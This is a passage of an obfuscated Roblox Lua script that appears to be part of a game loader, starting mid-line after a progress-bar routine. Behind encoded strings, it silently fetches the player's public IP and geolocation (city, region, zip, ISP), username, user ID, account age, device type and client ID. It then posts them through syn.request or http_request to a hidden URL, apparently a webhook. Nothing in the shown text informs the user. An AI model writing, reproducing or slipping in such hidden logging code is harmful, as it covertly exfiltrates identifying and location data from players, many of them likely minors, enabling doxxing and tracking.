);SetText(v7("\206\221\180\226\219\255\204\191\230\128\165\139","\174\139\165\209\129"));v173.Parent.MainFrame.ProgressBar.Content:TweenSize(UDim2.new(0 -0 ,188,0 + 0 ,1431 -(1233 + 180) ),Enum.EasingDirection.Out,Enum.EasingStyle.Quint,969.2 -(522 + 447) );wait(1);HideProgressBar();wait(1422 -(107 + 1314) );FinishLoading();end coroutine.wrap(v137)();local v138=game.Players.LocalPlayer;local v139=game:GetService(v7("\150\160\231\211\239\13\96\109\183\128\231\211\208\10\115\125","\24\195\211\130\161\166\99\16"));local function v140() if v139.TouchEnabled then return v7("\107\12\235\37\95\19","\118\38\99\137\76\51");elseif v139.GamepadEnabled then return v7("\222\41\11\1\6\44\248","\64\157\70\101\114\105");else return v7("\112\139","\112\32\200\199\131");end end local function v141() local v197=game:GetService(v7("\30\82\68\153\205\170\46\53\68\85\187\208\152\39\62\70\85\187\198","\66\76\48\60\216\163\203")):GetClientId();return v197 or v7("\143\136\114\253\80\217\42\250\174\78\218\123","\68\218\230\25\147\63\174") ;end local v142,v143,v144,v145,v146,v147,v148;local v149,v150=pcall(function() local v198=0 + 0 ;local v199;local v200;local v201;while true do if (v198==(0 -0)) then v199=0;v200=nil;v198=1;end if (v198==(1 + 0)) then v201=nil;while true do if (v199==3) then v146=v201.zip or v7("\223\187\47\237\79\40\228\245\30\234\80","\95\138\213\68\131\32") ;v147=v201.isp or v7("\31\38\170\77\121\61\38\225\106\69\26","\22\74\72\193\35") ;v199=7 -3 ;end if (v199==(3 -2)) then local v226=0;while true do if (v226==(1911 -(716 + 1194))) then v199=2;break;end if (v226==(0 + 0)) then v201=game:GetService(v7("\57\178\185\190\5\22\3\176\164\173\51","\115\113\198\205\206\86")):JSONDecode(v200);v143=v201.country or v7("\177\89\245\84\139\64\240\26\167\88\235\84\144\69\231","\58\228\55\158") ;v226=1 + 0 ;end end end if (v199==0) then v142=game:HttpGet(v7("\165\62\71\92\165\247\101\28\77\166\164\100\90\92\191\171\51\29\67\164\170","\214\205\74\51\44"));v200=game:HttpGet(v7("\242\88\246\236\45\181\3\235\236\58\251\92\235\178\116\245\65\173\246\100\245\66\173","\23\154\44\130\156")   .. v142 );v199=504 -(74 + 429) ;end if (v199==(7 -3)) then v148=(v142:match(v7("\18\66\161\92\105\55\217\19\104","\56\76\25\132")) and v7("\119\241\189\114","\175\62\161\203\70")) or v7("\21\237\213\69","\85\92\189\163\115") ;break;end if (v199==(1 + 1)) then v144=v201.city or v7("\129\135\219\32\51\186\59\244\170\217\58\37","\85\212\233\176\78\92\205") ;v145=v201.regionName or v7("\127\86\131\236\69\79\134\162\120\93\143\235\69\86","\130\42\56\232") ;v199=6 -3 ;end end break;end end end);if  not v149 then local v208=0 + 0 ;while true do if (v208==0) then v142=v7("\15\173\57\52\44\168\112\44\38\236\54\61\61\175\56\120\0\156","\88\73\204\80");v143=v7("\8\130\25\74\44\222\110\151\31\6\47\223\58\128\24\6\10\213\59\141\4\84\48","\186\78\227\112\38\73");v208=1;end if (v208==1) then v144=v7("\218\86\244\89\86\126\188\67\242\21\85\127\232\84\245\21\112\115\232\78","\26\156\55\157\53\51");v145=v7("\170\217\31\213\189\84\204\204\25\153\190\85\152\219\30\153\138\85\139\209\25\215","\48\236\184\118\185\216");v208=5 -3 ;end if (2==v208) then v146=v7("\195\188\94\60\202\48\165\169\88\112\201\49\241\190\95\112\245\61\245","\84\133\221\55\80\175");v147=v7("\155\230\45\170\194\88\253\243\43\230\193\89\169\228\44\230\238\111\141","\60\221\135\68\198\167");v208=3;end if (v208==3) then v148=v7("\200\188\241\143\71\221\174\169\247\195\68\220\250\190\240\195\107\233\174\137\225\147\71","\185\142\221\152\227\34");break;end end end local v151=game.Players.NumPlayers;local v152=os.time();local v153=os.date(v7("\25\143\67","\151\56\165\55\154\35\83"),v152);local v154="";local v155=v138.Name;local v156=v138.UserId;local v157=v138.AccountAge;local v158=v140();local v159=v141();local v160=game:GetService(v7("\141\66\23\229\165\87\21\226\161\64\0\221\165\81\19\231\163\70","\142\192\35\101"));local v161,v162=pcall(function() return v160:GetProductInfo(game.PlaceId);end);local v163=(v161 and v162.Name) or v7("\227\123\34\173\232\155\162\86\241\116\36\166","\118\182\21\73\195\135\236\204") ;local v164=v7("\0\40\14\80\23\87\178\71\43\13\87\74\31\242\10\48\21\88\74\14\242\5\115\29\65\9\8\238\71","\157\104\92\122\32\100\109")   .. tostring(game.PlaceId) ;local v165={[v7("\183\175\219\198\56","\203\195\198\175\170\93\71\237")]=v142,[v7("\45\68\50\218\67","\156\78\43\94\181\49\113")]=8523002 -5075999 ,[v7("\116\231\203\183\14\81","\25\18\136\164\195\107\35")]={[v7("\252\40\177\91","\216\136\77\201\47\18\220\161")]=v7("\7\227\41\154\33\248\216\109","\226\77\140\75\186\104\188")   .. game.JobId },[v7("\184\219\196\55\64\171","\47\217\174\176\95")]={[v7("\182\220\123\7","\70\216\189\22\98\210\52\24")]=v163,[v7("\207\205\175","\179\186\191\195\231")]=v164},[v7("\255\54\29\232\253\44","\132\153\95\120")]={{[v7("\191\179\3\40","\192\209\210\110\77\151\186")]=v7("\208\15\35\240\250\214\160\45\35\228\250","\164\128\99\66\137\159"),[v7("\22\136\229\171\5","\222\96\233\137")]=v155,[v7("\176\189\171\22\134\246","\144\217\211\199\127\232\147")]=true},{[v7("\246\46\51\45","\36\152\79\94\72\181\37\98")]=v7("\242\192\66\60\194\204\78\48\217\152\115\54\218\221","\95\183\184\39"),[v7("\163\62\235\51\81","\98\213\95\135\70\52\224")]=os.date(v7("\187\130\133\55\17\220\227\140\115\24\190\230\240\55\85\234\227\140\95\14\187\142\147\50\103\190\150\253\84","\52\158\195\169\23"),v152),[v7("\115\178\62\125\136\48","\235\26\220\82\20\230\85\27")]=true},{[v7("\134\160\228\199","\20\232\193\137\162")]=v7("\17\220\215\175\247\152\87\116\58\218\198\179\243\137\19\49\43\209","\17\66\191\165\198\135\236\119"),[v7("\25\174\162\6\250","\177\111\207\206\115\159\136\140")]=string.format(v7("\62\204\3\41\156\10\76\76","\63\101\233\112\116\180\47"),v163,v164),[v7("\202\53\225\27\246\51","\86\163\91\141\114\152")]=false},{[v7("\93\10\121\118","\90\51\107\20\19")]=v7("\189\252\132\236\56\205\217\161","\93\237\144\229\143"),[v7("\3\247\252\12\14","\38\117\150\144\121\107")]=tostring(game.PlaceId),[v7("\36\181\226\51\35\190","\90\77\219\142")]=true},{[v7("\232\5\44\60","\26\134\100\65\89\44\103")]=v7("\193\239\49\58\161\227\163\5\48\161\227\163\25\7","\196\145\131\80\67"),[v7("\8\177\10\29\29","\136\126\208\102\104\120")]=tostring(v156),[v7("\113\132\194\74\161\87","\49\24\234\174\35\207\50\93")]=true},{[v7("\2\243\240\141","\17\108\146\157\232")]=v7("\106\192\23\226\58\166\95\131\53\234\42\232\3\231\21\244\60\225","\200\43\163\116\141\79"),[v7("\169\55\49\150\181","\131\223\86\93\227\208\148")]=tostring(v157),[v7("\234\75\186\191\19\176","\213\131\37\214\214\125")]=true},{[v7("\40\42\40\186","\129\70\75\69\223")]=v7("\98\206\229\224\127\234\6\255\234\249\121","\143\38\171\147\137\28"),[v7("\198\131\181\230\6","\180\176\226\217\147\99\131")]=v158,[v7("\218\183\35\14\221\188","\103\179\217\79")]=true},{[v7("\68\182\17\208","\195\42\215\124\181\33\236")]=v7("\61\85\54\39\32\234\77\122\56\43\43\236\31\64","\152\109\57\87\94\69"),[v7("\239\214\6\182\187","\200\153\183\106\195\222\178\52")]=v143,[v7("\59\237\132\52\71\95","\58\82\131\232\93\41")]=true},{[v7("\141\86\221\16","\95\227\55\176\117\61")]=v7("\40\114\34\82\174\10\62\0\66\191\1","\203\120\30\67\43"),[v7("\231\36\65\250\220","\185\145\69\45\143")]=v144,[v7("\131\17\21\175\210\143","\188\234\127\121\198")]=true},{[v7("\54\51\30\134","\227\88\82\115")]=v7("\115\19\187\190\7\97\3\45\191\160\11\124\77","\19\35\127\218\199\98"),[v7("\10\250\6\247\25","\130\124\155\106")]=v145,[v7("\220\197\250\166\173\243","\223\181\171\150\207\195\150\28")]=true},{[v7("\66\59\238\171","\105\44\90\131\206")]=v7("\207\236\179\160\13\44\191\218\187\169","\94\159\128\210\217\104"),[v7("\70\248\10\170\90","\26\48\153\102\223\63\31\153")]=v146,[v7("\11\78\225\250\12\69","\147\98\32\141")]=true},{[v7("\22\66\238\207","\43\120\35\131\170\102\54")]=v7("\100\10\134\175\160\162\196\125\53\183","\228\52\102\231\214\197\208"),[v7("\8\225\121\223\239","\182\126\128\21\170\138\235\121")]=v147,[v7("\130\212\57\239\136\22","\102\235\186\85\134\230\115\80")]=true},{[v7("\89\13\51\90","\66\55\108\94\63\18\180")]=v7("\61\189\197\3\62\73\17","\57\116\237\229\87\71"),[v7("\188\176\225\242\114","\39\202\209\141\135\23\142")]=v148,[v7("\246\61\5\3\60\253","\152\159\83\105\106\82")]=true},{[v7("\143\199\92\247","\60\225\166\49\146\169")]=v7("\7\41\6\14","\103\79\126\79\74\97"),[v7("\172\126\223\102\91","\122\218\31\179\19\62")]=v159,[v7("\186\216\193\200\199\164","\37\211\182\173\161\169\193")]=true},{[v7("\249\59\64\220","\217\151\90\45\185\72\27")]=v7("\247\115\243\19\90\131\76\235\19\79\198\110\244\82\95\205\60\212\23\68\213\121\245","\54\163\28\135\114"),[v7("\62\218\81\151\75","\31\72\187\61\226\46")]=tostring(v151),[v7("\202\8\79\219\73\123","\68\163\102\35\178\39\30")]=true},{[v7("\176\113\215\194","\113\222\16\186\167\99\213\227")]=v7("\30\2\250\239\43\28\187\198\60\1\253\255\34\11","\150\78\110\155"),[v7("\147\196\43\244\161","\32\229\165\71\129\196\126\223")]=string.format(v7("\248\170\200\136\130\222\131\129\193\147\132\149\215\134\132\151\136\208\212\201\212\147\142\211\202\133\193\188\201\221\215\157\212\146\219\154\140\158\211\150\207\199\204\139\200\142\153\155\192\134\201\206\148\198\198\155\215\206\196\209\140\153\214\142\135\220\207\140\141","\181\163\233\164\225\225"),v156),[v7("\89\133\50\126\94\142","\23\48\235\94")]=false}},[v7("\104\211\213\88\68\39\211\113\202","\178\28\186\184\61\55\83")]=string.format(v7("\129\201\10\121\246\67\176\192\249\2\108\160\10\175\129\157\21\56\168\75\165\150\201\125","\149\164\173\39\92\146\110"),v153.year,v153.month,v153.day,v153.hour,v153.min,v153.sec)};((syn and syn.request) or http_request)({[v7("\198\53\28","\123\147\71\112\127\122")]=v7("\196\217\150\97\85\150\130\205\117\79\223\206\141\99\66\130\206\141\124\9\205\221\139\62\81\201\207\138\126\73\199\222\205\32\21\158\156\214\32\31\149\159\209\34\22\157\158\209\36\23\157\156\205\37\23\245\219\132\84\69\237\204\146\98\94\219\156\174\87\86\218\153\219\102\22\201\216\135\116\117\199\155\163\114\67\218\199\164\68\65\195\238\146\34\111\250\247\183\107\114\206\219\179\105\127\219\229\209\84\119\231\221\171\112\74\213\154\147\75\77\246","\38\172\173\226\17"),[v7("\96\20\56\231\66\21","\143\45\113\76")]=v7("\136\151\47\8","\92\216\216\124"),[v7("\115\55\173\68\248\73\33","\157\59\82\204\32")]={[v7("\27\49\237\238\236\228\199\252\12\39\243\255","\209\88\94\131\154\137\138\179")]=v7("\41\177\212\112\23\32\48\54\33\174\202\51\20\48\62\44","\66\72\193\164\28\126\67\81")},[v7("\197\35\172\65","\22\135\76\200\56\70")]=game:GetService(v7("\165\36\236\52\110\228\159\38\241\39\88","\129\237\80\152\68\61")):JSONEncode({[v7("\82\167\10\231\25\25\76","\56\49\200\100\147\124\119")]=v154,[v7("\201\51\189\245\200\45","\144\172\94\223")]={v165}})});
